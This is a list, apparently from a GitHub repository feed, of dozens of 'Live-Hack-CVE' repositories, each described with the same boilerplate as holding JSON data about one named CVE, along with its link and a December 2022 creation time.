**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41308 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41308](https://github.com/Live-Hack-CVE/CVE-2022-41308) create time: 2022-12-24T12:31:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35690 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35690](https://github.com/Live-Hack-CVE/CVE-2022-35690) create time: 2022-12-24T12:31:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35689 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35689](https://github.com/Live-Hack-CVE/CVE-2022-35689) create time: 2022-12-24T12:31:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41307 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41307](https://github.com/Live-Hack-CVE/CVE-2022-41307) create time: 2022-12-24T12:31:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41306 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41306](https://github.com/Live-Hack-CVE/CVE-2022-41306) create time: 2022-12-24T12:31:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35691 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35691](https://github.com/Live-Hack-CVE/CVE-2022-35691) create time: 2022-12-24T12:31:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41304 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41304](https://github.com/Live-Hack-CVE/CVE-2022-41304) create time: 2022-12-24T12:31:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35698 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35698](https://github.com/Live-Hack-CVE/CVE-2022-35698) create time: 2022-12-24T12:31:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31651 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31651](https://github.com/Live-Hack-CVE/CVE-2022-31651) create time: 2022-12-24T12:31:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26691 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26691](https://github.com/Live-Hack-CVE/CVE-2022-26691) create time: 2022-12-24T12:30:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30787 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30787](https://github.com/Live-Hack-CVE/CVE-2022-30787) create time: 2022-12-24T12:30:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30785 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30785](https://github.com/Live-Hack-CVE/CVE-2022-30785) create time: 2022-12-24T12:30:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30783 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30783](https://github.com/Live-Hack-CVE/CVE-2022-30783) create time: 2022-12-24T12:30:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1348 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1348](https://github.com/Live-Hack-CVE/CVE-2022-1348) create time: 2022-12-24T12:30:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0494 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0494](https://github.com/Live-Hack-CVE/CVE-2022-0494) create time: 2022-12-24T12:30:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27438 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27438](https://github.com/Live-Hack-CVE/CVE-2022-27438) create time: 2022-12-24T12:30:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21658 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21658](https://github.com/Live-Hack-CVE/CVE-2022-21658) create time: 2022-12-24T12:29:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28291 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28291](https://github.com/Live-Hack-CVE/CVE-2022-28291) create time: 2022-12-24T12:29:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30126 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30126](https://github.com/Live-Hack-CVE/CVE-2022-30126) create time: 2022-12-24T12:29:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23771 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23771](https://github.com/Live-Hack-CVE/CVE-2022-23771) create time: 2022-12-24T12:29:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29162 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29162](https://github.com/Live-Hack-CVE/CVE-2022-29162) create time: 2022-12-24T12:29:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23770 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23770](https://github.com/Live-Hack-CVE/CVE-2022-23770) create time: 2022-12-24T12:29:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23769 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23769](https://github.com/Live-Hack-CVE/CVE-2022-23769) create time: 2022-12-24T12:29:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39201 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39201](https://github.com/Live-Hack-CVE/CVE-2022-39201) create time: 2022-12-24T12:29:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39229 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39229](https://github.com/Live-Hack-CVE/CVE-2022-39229) create time: 2022-12-24T12:29:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22128 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22128](https://github.com/Live-Hack-CVE/CVE-2022-22128) create time: 2022-12-24T12:28:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39278 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39278](https://github.com/Live-Hack-CVE/CVE-2022-39278) create time: 2022-12-24T12:28:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-4281 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-4281](https://github.com/Live-Hack-CVE/CVE-2013-4281) create time: 2022-12-24T11:04:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-4253 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-4253](https://github.com/Live-Hack-CVE/CVE-2013-4253) create time: 2022-12-24T11:03:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-20016 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-20016](https://github.com/Live-Hack-CVE/CVE-2016-20016) create time: 2022-12-24T11:04:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-20017 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-20017](https://github.com/Live-Hack-CVE/CVE-2016-20017) create time: 2022-12-24T10:25:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-20045 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-20045](https://github.com/Live-Hack-CVE/CVE-2017-20045) create time: 2022-12-24T11:03:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-20044 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-20044](https://github.com/Live-Hack-CVE/CVE-2017-20044) create time: 2022-12-24T11:03:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-20042 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-20042](https://github.com/Live-Hack-CVE/CVE-2017-20042) create time: 2022-12-24T11:03:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-20043 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-20043](https://github.com/Live-Hack-CVE/CVE-2017-20043) create time: 2022-12-24T11:03:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7670 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7670](https://github.com/Live-Hack-CVE/CVE-2019-7670) create time: 2022-12-24T10:29:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7669 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7669](https://github.com/Live-Hack-CVE/CVE-2019-7669) create time: 2022-12-24T10:27:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7667 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7667](https://github.com/Live-Hack-CVE/CVE-2019-7667) create time: 2022-12-24T10:27:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10604 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10604](https://github.com/Live-Hack-CVE/CVE-2020-10604) create time: 2022-12-24T11:03:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10148 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10148](https://github.com/Live-Hack-CVE/CVE-2020-10148) create time: 2022-12-24T11:03:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15279 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15279](https://github.com/Live-Hack-CVE/CVE-2020-15279) create time: 2022-12-24T11:02:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10709 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10709](https://github.com/Live-Hack-CVE/CVE-2020-10709) create time: 2022-12-24T11:02:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10716 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10716](https://github.com/Live-Hack-CVE/CVE-2020-10716) create time: 2022-12-24T11:02:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10744 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10744](https://github.com/Live-Hack-CVE/CVE-2020-10744) create time: 2022-12-24T11:02:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15084 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15084](https://github.com/Live-Hack-CVE/CVE-2020-15084) create time: 2022-12-24T11:02:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15087 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15087](https://github.com/Live-Hack-CVE/CVE-2020-15087) create time: 2022-12-24T11:01:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15117 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15117](https://github.com/Live-Hack-CVE/CVE-2020-15117) create time: 2022-12-24T11:01:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15223 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15223](https://github.com/Live-Hack-CVE/CVE-2020-15223) create time: 2022-12-24T11:01:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16122 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16122](https://github.com/Live-Hack-CVE/CVE-2020-16122) create time: 2022-12-24T11:01:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25629 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25629](https://github.com/Live-Hack-CVE/CVE-2020-25629) create time: 2022-12-24T11:01:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25238 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25238](https://github.com/Live-Hack-CVE/CVE-2020-25238) create time: 2022-12-24T11:01:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12744 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12744](https://github.com/Live-Hack-CVE/CVE-2020-12744) create time: 2022-12-24T11:01:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25193 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25193](https://github.com/Live-Hack-CVE/CVE-2020-25193) create time: 2022-12-24T11:01:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9285 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9285](https://github.com/Live-Hack-CVE/CVE-2020-9285) create time: 2022-12-24T11:00:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25184 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25184](https://github.com/Live-Hack-CVE/CVE-2020-25184) create time: 2022-12-24T10:59:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25150 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25150](https://github.com/Live-Hack-CVE/CVE-2020-25150) create time: 2022-12-24T10:59:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24433 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24433](https://github.com/Live-Hack-CVE/CVE-2020-24433) create time: 2022-12-24T10:59:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24441 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24441](https://github.com/Live-Hack-CVE/CVE-2020-24441) create time: 2022-12-24T10:59:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2506 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2506](https://github.com/Live-Hack-CVE/CVE-2020-2506) create time: 2022-12-24T10:59:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24405 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24405](https://github.com/Live-Hack-CVE/CVE-2020-24405) create time: 2022-12-24T10:59:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24404 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24404](https://github.com/Live-Hack-CVE/CVE-2020-24404) create time: 2022-12-24T10:59:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25673 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25673](https://github.com/Live-Hack-CVE/CVE-2020-25673) create time: 2022-12-24T10:29:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25634 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25634](https://github.com/Live-Hack-CVE/CVE-2020-25634) create time: 2022-12-24T10:29:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25716 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25716](https://github.com/Live-Hack-CVE/CVE-2020-25716) create time: 2022-12-24T10:28:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25719 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25719](https://github.com/Live-Hack-CVE/CVE-2020-25719) create time: 2022-12-24T10:28:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25654 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25654](https://github.com/Live-Hack-CVE/CVE-2020-25654) create time: 2022-12-24T10:28:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26195 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26195](https://github.com/Live-Hack-CVE/CVE-2020-26195) create time: 2022-12-24T10:28:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27779 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27779](https://github.com/Live-Hack-CVE/CVE-2020-27779) create time: 2022-12-24T10:28:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41228 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41228](https://github.com/Live-Hack-CVE/CVE-2021-41228) create time: 2022-12-24T11:08:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41213 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41213](https://github.com/Live-Hack-CVE/CVE-2021-41213) create time: 2022-12-24T11:08:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41203 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41203](https://github.com/Live-Hack-CVE/CVE-2021-41203) create time: 2022-12-24T11:08:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41290 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41290](https://github.com/Live-Hack-CVE/CVE-2021-41290) create time: 2022-12-24T11:02:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1562 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1562](https://github.com/Live-Hack-CVE/CVE-2021-1562) create time: 2022-12-24T10:28:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1583 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1583](https://github.com/Live-Hack-CVE/CVE-2021-1583) create time: 2022-12-24T10:28:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1577 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1577](https://github.com/Live-Hack-CVE/CVE-2021-1577) create time: 2022-12-24T10:27:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1589 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1589](https://github.com/Live-Hack-CVE/CVE-2021-1589) create time: 2022-12-24T10:27:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1423 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1423](https://github.com/Live-Hack-CVE/CVE-2021-1423) create time: 2022-12-24T10:27:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1501 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1501](https://github.com/Live-Hack-CVE/CVE-2021-1501) create time: 2022-12-24T10:27:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1448 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1448](https://github.com/Live-Hack-CVE/CVE-2021-1448) create time: 2022-12-24T10:27:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1506 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1506](https://github.com/Live-Hack-CVE/CVE-2021-1506) create time: 2022-12-24T10:27:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1515 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1515](https://github.com/Live-Hack-CVE/CVE-2021-1515) create time: 2022-12-24T10:26:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1449 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1449](https://github.com/Live-Hack-CVE/CVE-2021-1449) create time: 2022-12-24T10:26:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1437 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1437](https://github.com/Live-Hack-CVE/CVE-2021-1437) create time: 2022-12-24T10:26:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1469 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1469](https://github.com/Live-Hack-CVE/CVE-2021-1469) create time: 2022-12-24T10:26:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20208 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20208](https://github.com/Live-Hack-CVE/CVE-2021-20208) create time: 2022-12-24T10:26:30Z

